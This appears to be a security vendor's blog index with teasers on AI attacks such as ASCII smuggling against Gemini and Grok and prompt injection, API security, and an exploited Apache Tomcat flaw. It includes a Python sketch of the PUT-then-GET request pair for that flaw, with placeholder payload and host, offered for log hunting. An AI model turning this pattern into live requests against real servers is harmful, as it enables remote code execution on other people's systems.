Here you'll find regularly updated content on AI security, the broader cybersecurity landscape, news, events, and much more.
Researcher Viktor Markopoulos has discovered that ASCII Smuggling uses hidden Unicode characters to bypass human audit, enabling enterprise identity spoofing and data poisoning on Gemini and Grok.
If you prefer to be notified of new posts via email, simply subscribe to our blog below.
FireTail’s latest platform update gives customers expanded AI security features and discovery capabilities to better find, document, and protect AI initiatives across their organizations. Here, we look at what the update covers and the benefits these new features deliver for FireTail customers.
In this blog, we take a closer look at Prompt Injection, the #1 vulnerability on the OWASP Top 10 list of LLM risks for 2025. Join us in the first of this 10-part series as we examine the root causes of prompt injection, how these attacks are carried out, and the best methods to avoid them.
FireTail has been selected as a finalist for the Black Hat Asia 2025 Startup Spotlight Competition. We're delighted to be taking part and can't wait to showcase how FireTail helps enterprises discover, assess, and secure AI usage while preventing threats like shadow AI, data leaks, and AI-specific attacks.
Researchers recently found a vulnerability in Apache Tomcat servers that allows an attacker to achieve remote code execution with a single PUT request to a specific API, followed by a GET. This vulnerability is now being actively exploited in the wild.
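The teaser above describes a two-step pattern: a PUT that plants content on the server, then a GET that triggers it (this appears to match the Tomcat flaw publicly tracked as CVE-2025-24813). As a rough illustration for defenders hunting in access logs, here is a minimal sketch of what such a request pair could look like on the wire. The host, paths, cookie value, and payload body are hypothetical placeholders, not a working exploit.

```python
# Sketch of the PUT-then-GET request pair described above, rendered as raw
# HTTP/1.1 text. All names below (host, paths, payload) are illustrative
# placeholders chosen for this example.

HOST = "tomcat.example.internal"  # hypothetical target host


def build_request_pair(host: str) -> tuple[str, str]:
    body = "<serialized-payload-placeholder>"
    # Step 1: a PUT request that writes attacker-controlled content
    # to a path the server will later read back.
    put_req = (
        "PUT /uploads/payload.session HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )
    # Step 2: a follow-up GET that causes the server to load (and, in the
    # vulnerable case, deserialize) the previously uploaded content.
    get_req = (
        "GET /index.jsp HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Cookie: JSESSIONID=.payload\r\n"
        "\r\n"
    )
    return put_req, get_req


put_req, get_req = build_request_pair(HOST)
print(put_req.splitlines()[0])  # PUT /uploads/payload.session HTTP/1.1
print(get_req.splitlines()[0])  # GET /index.jsp HTTP/1.1
```

In access logs, the tell-tale signature is this pairing: an unexpected PUT to a writable path followed shortly by a GET from the same client.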
Security teams today face a dual challenge: protecting AI systems from external threats while securing the APIs that power them. The reality is clear—if your APIs aren’t secure, neither is your AI.
A BreachForums user claimed to have breached OmniGPT and shared samples of stolen data to back up the claim. Weeks later, researchers are still scrambling to determine the scope of the breach, the attack method, and more.